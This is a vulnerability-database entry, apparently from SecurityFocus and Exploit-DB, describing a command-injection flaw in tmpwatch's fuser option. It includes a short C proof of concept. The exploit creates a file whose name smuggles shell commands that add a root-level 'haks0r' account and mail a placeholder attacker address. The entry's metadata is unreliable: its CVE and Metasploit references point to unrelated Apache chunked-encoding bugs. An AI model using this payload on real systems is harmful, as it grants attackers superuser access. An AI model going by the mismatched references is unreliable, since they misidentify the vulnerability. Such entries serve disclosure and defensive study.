Vulnerability in tmpwatch

vendor:

tmpwatch

by:

SecurityFocus

7.5

CVSS

HIGH

Improper Handling of Arguments to System() Library Calls

CWE

Product Name: tmpwatch

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: YES

Related CWE: CVE-2002-0392

CPE: o:redhat:tmpwatch

Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/, https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/, https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix-like systems

2002

An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously-constructed filename including shell meta characters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges.

Mitigation:

Ensure that tmpwatch is not run with root privileges.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/1785/info

A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously-constructed filename including shell meta characters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges.

#include <stdio.h>

int main()
{
   FILE *f;
   char filename[100] = ";useradd -u 0 -g 0 haks0r;mail 
haks0r@somehost.com<blablabla";

   if((f = fopen(filename, "a")) == 0) {
      perror("Could not create file");
      exit(1);
   }
   close(f);
}